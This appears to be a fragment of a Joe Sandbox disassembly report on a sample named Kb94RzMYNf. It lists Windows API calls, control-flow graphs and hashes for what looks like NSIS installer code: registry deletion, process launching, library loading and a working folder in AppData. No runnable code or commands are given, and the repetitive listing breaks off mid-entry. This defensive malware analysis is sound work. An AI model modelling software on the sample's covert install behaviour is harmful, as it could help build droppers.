                                                                                                                                                              • API String ID: 1716503409-161808582
                                                                                                                                                              • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                                              • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                                                                                              • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                                              • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 716 402bff-402c28 RegOpenKeyExW 717 402c93-402c97 716->717 718 402c2a-402c35 716->718 719 402c50-402c60 RegEnumKeyW 718->719 720 402c62-402c74 RegCloseKey call 40642a 719->720 721 402c37-402c3a 719->721 729 402c76-402c85 720->729 730 402c9a-402ca0 720->730 722 402c87-402c8a RegCloseKey 721->722 723 402c3c-402c4e call 402bff 721->723 725 402c90-402c92 722->725 723->719 723->720 725->717 729->717 730->725 731 402ca2-402cb0 RegDeleteKeyW 730->731 731->725 732 402cb2 731->732 732->717
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                              • Opcode ID: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                                                                                              • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                                                                                              • Opcode Fuzzy Hash: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                                                                                              • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 734 401bdf-401bf7 call 402ba2 * 2 739 401c03-401c07 734->739 740 401bf9-401c00 call 402bbf 734->740 742 401c13-401c19 739->742 743 401c09-401c10 call 402bbf 739->743 740->739 745 401c1b-401c2f call 402ba2 * 2 742->745 746 401c5f-401c89 call 402bbf * 2 FindWindowExW 742->746 743->742 757 401c31-401c4d SendMessageTimeoutW 745->757 758 401c4f-401c5d SendMessageW 745->758 759 401c8f 746->759 760 401c92-401c95 757->760 758->759 759->760 761 401c9b 760->761 762 402a4c-402a5b 760->762 761->762
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                              • String ID: !
                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                              • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                                              • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                                                                                              • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                                              • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
                                                                                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                              • String ID: `OC
                                                                                                                                                              • API String ID: 334405425-799166930
                                                                                                                                                              • Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                                              • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                                                                                              • Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                                              • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
                                                                                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID: : Completed
                                                                                                                                                              • API String ID: 3677997916-2954849223
                                                                                                                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                              • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                                                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                              • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,774D23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,774D23A0), ref: 0040520A
                                                                                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                • Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                                                • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3585118688-0
                                                                                                                                                              • Opcode ID: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                                                                                              • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                                                                                              • Opcode Fuzzy Hash: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                                                                                              • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                                                • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\neoimpressionism,?,00000000,000000F0), ref: 00401645
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\neoimpressionism, xrefs: 00401638
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\neoimpressionism
                                                                                                                                                              • API String ID: 1892508949-3269196450
                                                                                                                                                              • Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                              • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                                                                                              • Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                              • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                                              Strings
                                                                                                                                                              • Error launching installer, xrefs: 00405743
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                              • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                                              • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                                                                                              • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                                              • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                                                                                                                              APIs
                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                                              • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                                                                                              • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                                                                                              • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 849931509-0
                                                                                                                                                              • Opcode ID: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                                                                                              • Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
                                                                                                                                                              • Opcode Fuzzy Hash: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                                                                                              • Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629
                                                                                                                                                              APIs
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405292
                                                                                                                                                                • Part of subcall function 00404160: SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404172
                                                                                                                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 004052DE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
